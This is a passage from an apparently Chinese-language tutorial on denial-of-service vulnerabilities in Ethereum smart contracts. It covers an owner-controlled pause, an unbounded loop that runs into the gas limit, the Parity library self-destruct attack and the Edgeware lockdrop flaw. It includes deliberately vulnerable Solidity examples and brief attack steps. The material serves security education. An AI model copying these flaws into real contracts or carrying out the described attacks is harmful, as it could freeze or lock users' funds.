<p>&#x672C;&#x7C7B;&#x578B;&#x6D89;&#x53CA;&#x5230;&#x51FD;&#x6570;&#x4FEE;&#x9970;&#x5173;&#x952E;&#x8BCD;&#x7684;&#x4F7F;&#x7528;&#xFF0C;owner&#x53EF;&#x4EE5;&#x8BBE;&#x5B9A;&#x5408;&#x7EA6;&#x7684;&#x5F53;&#x524D;&#x72B6;&#x6001;&#xFF0C;&#x56E0;&#x4E3A;&#x9519;&#x8BEF;&#x7684;&#x64CD;&#x4F5C;&#x4F7F;&#x5F97;&#x5F53;&#x524D;&#x5408;&#x7EA6;&#x7684;&#x72B6;&#x6001;&#x8BBE;&#x7F6E;&#x4E3A;&#x4E0D;&#x53EF;&#x4EA4;&#x6613;&#xFF0C;&#x51FA;&#x73B0;&#x975E;&#x4E3B;&#x89C2;&#x7684;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x3002;&#x5C06;&#x4EE4;&#x724C;&#x7CFB;&#x7EDF;&#x7406;&#x89E3;&#x4E3A;&#x80A1;&#x5E02;&#xFF0C;&#x6709;&#x65F6;&#x9700;&#x8981;&#x8FDB;&#x884C;&#x4F11;&#x5E02;&#x64CD;&#x4F5C;&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>pragma solidity ^0.4.24;
 
contract error{
    address owner;
    bool activestatus;
 
    modifier onlyowner{
        require(msg.sender==owner);
        _;
    }
    modifier active{
        require(activestatus);
        _;
    }
    function activecontract() onlyowner{
        activestatus = true;
    }
    function inactivecontract() onlyowner{
        activestatus = false;
    }
    function transfer() active{
 
    }
 
}
</code></pre><p>&#x5982;&#x679C;owner&#x8C03;&#x7528;&#x4E86;inactivecontract&#x51FD;&#x6570;&#xFF0C;&#x4F7F;&#x5F97;activestatus&#x53D8;&#x6210;false</p>
<p>&#x4E4B;&#x540E;&#x6240;&#x6709;&#x88AB;active&#x4FEE;&#x9970;&#x7684;&#x51FD;&#x6570;&#x90FD;&#x65E0;&#x6CD5;&#x8C03;&#x7528;&#xFF0C;&#x65E0;&#x6CD5;&#x901A;&#x8FC7;require&#x5224;&#x5B9A;</p>
<p>&#x4EE4;&#x724C;&#x751F;&#x6001;&#x7CFB;&#x7EDF;&#x7684;&#x6574;&#x4E2A;&#x64CD;&#x4F5C;&#x53D6;&#x51B3;&#x4E8E;&#x4E00;&#x4E2A;&#x5730;&#x5740;&#xFF0C;&#x8FD9;&#x662F;&#x975E;&#x5E38;&#x5371;&#x9669;&#x7684;</p>
<h2 class="mume-header" id="%E6%95%B0%E7%BB%84%E6%88%96%E6%98%A0%E5%B0%84%E8%BF%87%E9%95%BF">&#x6570;&#x7EC4;&#x6216;&#x6620;&#x5C04;&#x8FC7;&#x957F;</h2>

<p>&#x672C;&#x7C7B;&#x578B;&#x7684;&#x6F0F;&#x6D1E;&#x5B58;&#x5728;&#x4E8E;&#x5229;&#x76CA;&#x5206;&#x53D1;&#x5408;&#x7EA6;&#xFF0C;&#x7C7B;&#x4F3C;&#x4E8E;&#x516C;&#x53F8;&#x7ED9;&#x80A1;&#x4E1C;&#x7684;&#x5206;&#x7EA2;&#xFF0C;&#x4F46;&#x662F;&#x7531;&#x4E8E;&#x4EE5;&#x592A;&#x574A;&#x533A;&#x5757;&#x6709;gas&#x8D39;&#x7387;&#x4EA4;&#x6613;&#x4E0A;&#x9650;&#xFF0C;&#x5982;&#x679C;&#x6570;&#x7EC4;&#x8FC7;&#x5927;&#x4F1A;&#x5BFC;&#x81F4;&#x64CD;&#x4F5C;&#x6267;&#x884C;&#x7684;gas&#x8FDC;&#x8FDC;&#x8D85;&#x51FA;&#x4E0A;&#x9650;&#xFF0C;&#x4ECE;&#x800C;&#x5BFC;&#x81F4;&#x4EA4;&#x6613;&#x5931;&#x8D25;&#xFF0C;&#x4E5F;&#x5C31;&#x65E0;&#x6CD5;&#x5206;&#x7EA2;</p>
<pre data-role="codeBlock" data-info class="language-"><code>contract DistributeTokens {
    address public owner; // gets set somewhere
    address[] investors; // array of investors
    uint[] investorTokens; // the amount of tokens each investor gets
 
    // ... extra functionality, including transfertoken()
 
    function invest() public payable {
        investors.push(msg.sender);
        investorTokens.push(msg.value * 5); // 5 times the wei sent
        }
 
    function distribute() public {
        require(msg.sender == owner); // only owner
        for(uint i = 0; i &lt; investors.length; i++) { 
            // here transferToken(to,amount) transfers &quot;amount&quot; of tokens to the address &quot;to&quot;
            transferToken(investors[i],investorTokens[i]); 
        }
    }
}
</code></pre><p>&#x8BE5;&#x6F0F;&#x6D1E;&#x7684;&#x53E6;&#x4E00;&#x4E2A;&#x5173;&#x952E;&#x70B9;&#x5728;&#x4E8E;&#x5FAA;&#x73AF;&#x904D;&#x5386;&#x7684;&#x6570;&#x7EC4;&#x53EF;&#x4EE5;&#x88AB;&#x4EBA;&#x4E3A;&#x6269;&#x5145;<br>
&#x5728;distribute()&#x51FD;&#x6570;&#x4E2D;&#x4F7F;&#x7528;&#x7684;&#x5FAA;&#x73AF;&#x6570;&#x7EC4;&#x7684;&#x6269;&#x5145;&#x5728;invert()&#x51FD;&#x6570;&#x91CC;&#x9762;&#xFF0C;&#x4F46;&#x662F;invert()&#x51FD;&#x6570;&#x662F;public&#x5C5E;&#x6027;&#xFF0C;&#x4E5F;&#x5C31;&#x610F;&#x5473;&#x7740;&#x53EF;&#x4EE5;&#x521B;&#x5EFA;&#x5F88;&#x591A;&#x7684;&#x7528;&#x6237;&#x8D26;&#x6237;&#xFF0C;&#x8BA9;&#x6570;&#x7EC4;&#x53D8;&#x5F97;&#x975E;&#x5E38;&#x5927;&#xFF0C;&#x4ECE;&#x800C;&#x4F7F;distribute()&#x51FD;&#x6570;&#x56E0;&#x4E3A;&#x8D85;&#x51FA;&#x4EE5;&#x592A;&#x574A;&#x533A;&#x5757;gas&#x8D39;&#x7387;&#x4E0A;&#x9650;&#x800C;&#x65E0;&#x6CD5;&#x6210;&#x529F;&#x6267;&#x884C;</p>
<h2 class="mume-header" id="%E4%BE%9D%E8%B5%96%E5%BA%93%E9%97%AE%E9%A2%98">&#x4F9D;&#x8D56;&#x5E93;&#x95EE;&#x9898;</h2>

<p>&#x4F9D;&#x8D56;&#x5916;&#x90E8;&#x7684;&#x5408;&#x7EA6;&#x5E93;&#x3002;&#x5982;&#x679C;&#x5916;&#x90E8;&#x5408;&#x7EA6;&#x7684;&#x5E93;&#x88AB;&#x5220;&#x9664;&#xFF0C;&#x90A3;&#x4E48;&#x6240;&#x6709;&#x4F9D;&#x8D56;&#x5E93;&#x7684;&#x5408;&#x7EA6;&#x670D;&#x52A1;&#x90FD;&#x65E0;&#x6CD5;&#x4F7F;&#x7528;&#x3002;&#x6709;&#x4E9B;&#x5408;&#x7EA6;&#x7528;&#x4E8E;&#x63A5;&#x53D7;ether&#xFF0C;&#x5E76;&#x8F6C;&#x8D26;&#x7ED9;&#x5176;&#x4ED6;&#x5730;&#x5740;&#x3002;&#x4F46;&#x662F;&#xFF0C;&#x8FD9;&#x4E9B;&#x5408;&#x7EA6;&#x672C;&#x8EAB;&#x5E76;&#x6CA1;&#x6709;&#x81EA;&#x5DF1;&#x5B9E;&#x73B0;&#x4E00;&#x4E2A;&#x8F6C;&#x8D26;&#x51FD;&#x6570;&#xFF0C;&#x800C;&#x662F;&#x901A;&#x8FC7;delegatecall&#x53BB;&#x8C03;&#x7528;&#x4E00;&#x4E9B;&#x5176;&#x4ED6;&#x5408;&#x7EA6;&#x4E2D;&#x7684;&#x8F6C;&#x8D26;&#x51FD;&#x6570;&#x53BB;&#x5B9E;&#x73B0;&#x8F6C;&#x8D26;&#x7684;&#x529F;&#x80FD;&#x3002;</p>
<p>&#x4E07;&#x4E00;&#x8FD9;&#x4E9B;&#x63D0;&#x4F9B;&#x8F6C;&#x8D26;&#x529F;&#x80FD;&#x7684;&#x5408;&#x7EA6;&#x6267;&#x884C;suicide&#x6216;self-destruct&#x64CD;&#x4F5C;&#x7684;&#x8BDD;&#xFF0C;&#x90A3;&#x4E48;&#xFF0C;&#x901A;&#x8FC7;delegatecall&#x8C03;&#x7528;&#x8F6C;&#x8D26;&#x529F;&#x80FD;&#x7684;&#x5408;&#x7EA6;&#x5C31;&#x6709;&#x53EF;&#x80FD;&#x53D1;&#x751F;ether&#x88AB;&#x51BB;&#x7ED3;&#x7684;&#x60C5;&#x51B5;</p>
<p>Parity &#x94B1;&#x5305;&#x906D;&#x53D7;&#x7684;&#x7B2C;&#x4E8C;&#x6B21;&#x653B;&#x51FB;&#x662F;&#x4E00;&#x4E2A;&#x5F88;&#x597D;&#x7684;&#x4F8B;&#x5B50;&#x3002;</p>
<p>Parity &#x94B1;&#x5305;&#x63D0;&#x4F9B;&#x4E86;&#x591A;&#x7B7E;&#x94B1;&#x5305;&#x7684;&#x5E93;&#x5408;&#x7EA6;&#x3002;&#x5F53;&#x5E93;&#x5408;&#x7EA6;&#x7684;&#x51FD;&#x6570;&#x88AB; delegatecall &#x8C03;&#x7528;&#x65F6;&#xFF0C;&#x5B83;&#x662F;&#x8FD0;&#x884C;&#x5728;&#x8C03;&#x7528;&#x65B9;&#xFF08;&#x5373;&#xFF1A;&#x7528;&#x6237;&#x591A;&#x7B7E;&#x5408;&#x7EA6;&#xFF09;&#x7684;&#x4E0A;&#x4E0B;&#x6587;&#x91CC;&#xFF0C;&#x50CF; m_numOwners &#x8FD9;&#x6837;&#x7684;&#x53D8;&#x91CF;&#x90FD;&#x6765;&#x81EA;&#x4E8E;&#x7528;&#x6237;&#x591A;&#x7B7E;&#x5408;&#x7EA6;&#x7684;&#x4E0A;&#x4E0B;&#x6587;&#x3002;&#x53E6;&#x5916;&#xFF0C;&#x4E3A;&#x4E86;&#x80FD;&#x88AB;&#x7528;&#x6237;&#x5408;&#x7EA6;&#x8C03;&#x7528;&#xFF0C;&#x8FD9;&#x4E9B;&#x5E93;&#x5408;&#x7EA6;&#x7684;&#x521D;&#x59CB;&#x5316;&#x51FD;&#x6570;&#x90FD;&#x662F;public&#x7684;&#x3002;</p>
<p>&#x5E93;&#x5408;&#x7EA6;&#x672C;&#x8D28;&#x4E0A;&#x4E5F;&#x4E0D;&#x8FC7;&#x662F;&#x53E6;&#x5916;&#x4E00;&#x4E2A;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#xFF0C;&#x8FD9;&#x6B21;&#x653B;&#x51FB;&#x8C03;&#x7528;&#x4F7F;&#x7528;&#x7684;&#x662F;&#x5E93;&#x5408;&#x7EA6;&#x672C;&#x8EAB;&#x7684;&#x4E0A;&#x4E0B;&#x6587;&#xFF0C;&#x5BF9;&#x8C03;&#x7528;&#x8005;&#x800C;&#x8A00;&#x8FD9;&#x4E2A;&#x5E93;&#x5408;&#x7EA6;&#x662F;&#x672A;&#x7ECF;&#x521D;&#x59CB;&#x5316;&#x7684;&#x3002;</p>
<ul>
<li>
<p>&#x653B;&#x51FB;&#x6D41;&#x7A0B;</p>
<p>1.&#x653B;&#x51FB;&#x8005;&#x8C03;&#x7528;&#x521D;&#x59CB;&#x5316;&#x51FD;&#x6570;&#x628A;&#x81EA;&#x5DF1;&#x8BBE;&#x7F6E;&#x4E3A;&#x5E93;&#x5408;&#x7EA6;&#x7684; owner&#x3002;</p>
<p>2.&#x653B;&#x51FB;&#x8005;&#x8C03;&#x7528; kill() &#x51FD;&#x6570;&#xFF0C;&#x628A;&#x5E93;&#x5408;&#x7EA6;&#x5220;&#x9664;&#xFF0C;&#x6240;&#x6709;&#x7684; ether &#x5C31;&#x88AB;&#x51BB;&#x7ED3;&#x4E86;</p>
</li>
<li>
<p>&#x89E3;&#x51B3;&#x65B9;&#x6848;<br>
&#x7EE7;&#x627F;&#x5E93;&#x5408;&#x7EA6;&#x540E;&#xFF0C;&#x5BF9;&#x4E8E;&#x53EF;&#x4EE5;&#x6539;&#x53D8;&#x6307;&#x667A;&#x80FD;&#x5408;&#x7EA6;&#x5B58;&#x50A8;&#x72B6;&#x6001;&#x7684;&#x51FD;&#x6570;&#xFF0C;&#x5C3D;&#x91CF;&#x91C7;&#x53D6;&#x91CD;&#x5199;&#x7684;&#x65B9;&#x5F0F;&#xFF0C;&#x907F;&#x514D;&#x88AB;&#x6076;&#x610F;&#x8C03;&#x7528;&#x3002;&#x7279;&#x522B;&#x662F;owner&#x4FEE;&#x9970;&#x8BCD;&#xFF0C;&#x8F6C;&#x8D26;&#x51FD;&#x6570;&#x3002;</p>
</li>
</ul>
<h2 class="mume-header" id="%E9%80%BB%E8%BE%91%E8%AE%BE%E8%AE%A1%E9%94%99%E8%AF%AF">&#x903B;&#x8F91;&#x8BBE;&#x8BA1;&#x9519;&#x8BEF;</h2>

<p>&#x672C;&#x7C7B;&#x578B;&#x6F0F;&#x6D1E;&#x5206;&#x6790;Edgeware&#x9501;&#x4ED3;&#x5408;&#x7EA6;&#x7684;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x6F0F;&#x6D1E;</p>
<p>Edgeware&#x9501;&#x4ED3;&#x5408;&#x7EA6;&#x53EF;&#x4EE5;&#x7406;&#x89E3;&#x4E3A;&#x4F60;&#x5F80;&#x94F6;&#x884C;&#x91CC;&#x5B9A;&#x671F;&#x5B58;&#x6B3E;&#xFF0C;&#x4E4B;&#x540E;&#x4F1A;&#x7ED9;&#x4F60;&#x6536;&#x76CA;&#xFF0C;&#x5173;&#x952E;&#x70B9;&#x5728;&#x4E8E;&#x53D1;&#x9001;token&#x540E;&#x8981;&#x8FDB;&#x884C;lock&#x64CD;&#x4F5C;&#xFF0C;&#x628A;&#x4F60;&#x7684;&#x8D44;&#x91D1;&#x9501;&#x8D77;&#x6765;&#xFF0C;&#x6682;&#x65F6;&#x65E0;&#x6CD5;&#x63D0;&#x73B0;&#xFF0C;&#x672C;&#x7C7B;&#x578B;&#x6F0F;&#x6D1E;&#x4F1A;&#x5BFC;&#x81F4;&#x53C2;&#x4E0E;&#x8005;lock&#x5931;&#x8D25;&#xFF0C;&#x4ECE;&#x800C;&#x65E0;&#x6CD5;&#x83B7;&#x5F97;&#x6536;&#x76CA;&#x3002;</p>
<pre data-role="codeBlock" data-info class="language-"><code>function lock(Term term, bytes calldata edgewareAddr, bool isValidator)
        external
        payable
        didStart
        didNotEnd
    {
        uint256 eth = msg.value;
        address owner = msg.sender;
        uint256 unlockTime = unlockTimeForTerm(term);
        // Create ETH lock contract
        Lock lockAddr = (new Lock).value(eth)(owner, unlockTime);
        // ensure lock contract has at least all the ETH, or fail
        assert(address(lockAddr).balance &gt;= msg.value);
        emit Locked(owner, eth, lockAddr, term, edgewareAddr, isValidator, now);
    }
</code></pre><p>&#x8FD9;&#x6BB5;&#x4EE3;&#x7801;&#x505A;&#x4E86;&#x5F3A;&#x5236;&#x5224;&#x65AD;:<br>
<code>assert(address(lockAddr).balance &gt;= msg.value);</code><br>
&#x5C5E;&#x4E8E;&#x53C2;&#x4E0E;&#x8005;&#x7684; Lock &#x5408;&#x7EA6;&#x7684;&#x91D1;&#x989D;&#x5FC5;&#x987B;&#x7B49;&#x4E8E;&#x53C2;&#x4E0E;&#x8005;&#x9501;&#x4ED3;&#x65F6;&#x53D1;&#x9001;&#x7684;&#x91D1;&#x989D;&#xFF0C;&#x5982;&#x679C;&#x4E0D;&#x7B49;&#x4E8E;&#xFF0C;&#x610F;&#x5473;&#x7740; lock &#x5931;&#x8D25;&#xFF0C;&#x8FD9;&#x4E2A;&#x5931;&#x8D25;&#x4F1A;&#x5BFC;&#x81F4;&#x53C2;&#x4E0E;&#x8005;&#x7684; Lock &#x5408;&#x7EA6;&#x201C;&#x762B;&#x75EA;&#x201D;&#x800C;&#x5F62;&#x6210;&#x201C;&#x62D2;&#x7EDD;&#x670D;&#x52A1;&#x201D;&#xFF0C;&#x76F4;&#x63A5;&#x540E;&#x679C;&#x5C31;&#x662F;&#xFF1A;&#x5047;&#x5982;&#x653B;&#x51FB;&#x6301;&#x7EED;&#x7740;&#xFF0C;Edgeware &#x8FD9;&#x4E2A; Lockdrop &#x673A;&#x5236;&#x5C06;&#x4E0D;&#x518D;&#x53EF;&#x7528;&#x3002; &#x4F46;&#x8FD9;&#x4E2A;&#x6F0F;&#x6D1E;&#x5BF9;&#x53C2;&#x4E0E;&#x8005;&#x7684;&#x8D44;&#x91D1;&#x65E0;&#x5F71;&#x54CD;&#x3002;&#x90A3;&#x4E48;&#xFF0C;&#x4EC0;&#x4E48;&#x60C5;&#x51B5;&#x4E0B;&#x4F1A;&#x5BFC;&#x81F4;&#x201C;address(lockAddr).balance &#x4E0D;&#x7B49;&#x4E8E; msg.value&#x201D; &#x653B;&#x51FB;&#x8005;&#x5982;&#x679C;&#x80FD;&#x63D0;&#x524D;&#x63A8;&#x6D4B;&#x51FA;&#x53C2;&#x4E0E;&#x8005;&#x7684; Lock &#x5408;&#x7EA6;&#x5730;&#x5740;&#x5C31;&#x884C;&#xFF08;&#x8FD9;&#x5728;&#x4EE5;&#x592A;&#x574A;&#x9EC4;&#x76AE;&#x4E66;&#x91CC;&#x6709;&#x660E;&#x786E;&#x4ECB;&#x7ECD;&#xFF0C;&#x53EF;&#x4EE5;&#x8BA1;&#x7B97;&#x51FA;&#x6765;&#xFF09;&#xFF0C;&#x6B64;&#x65F6;&#x653B;&#x51FB;&#x8005;&#x53EA;&#x9700;&#x63D0;&#x524D;&#x5F80;&#x53C2;&#x4E0E;&#x8005;&#x7684; Lock &#x5408;&#x7EA6;&#x5730;&#x5740;&#x968F;&#x4FBF;&#x8F6C;&#x70B9; ETH &#x5C31;&#x597D;&#xFF0C;&#x5C31;&#x4F1A;&#x5BFC;&#x81F4;&#x53C2;&#x4E0E;&#x8005;&#x65E0;&#x6CD5;lock&#x4ECE;&#x800C;&#x65E0;&#x6CD5;&#x83B7;&#x53D6;&#x6536;&#x76CA;</p>

      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>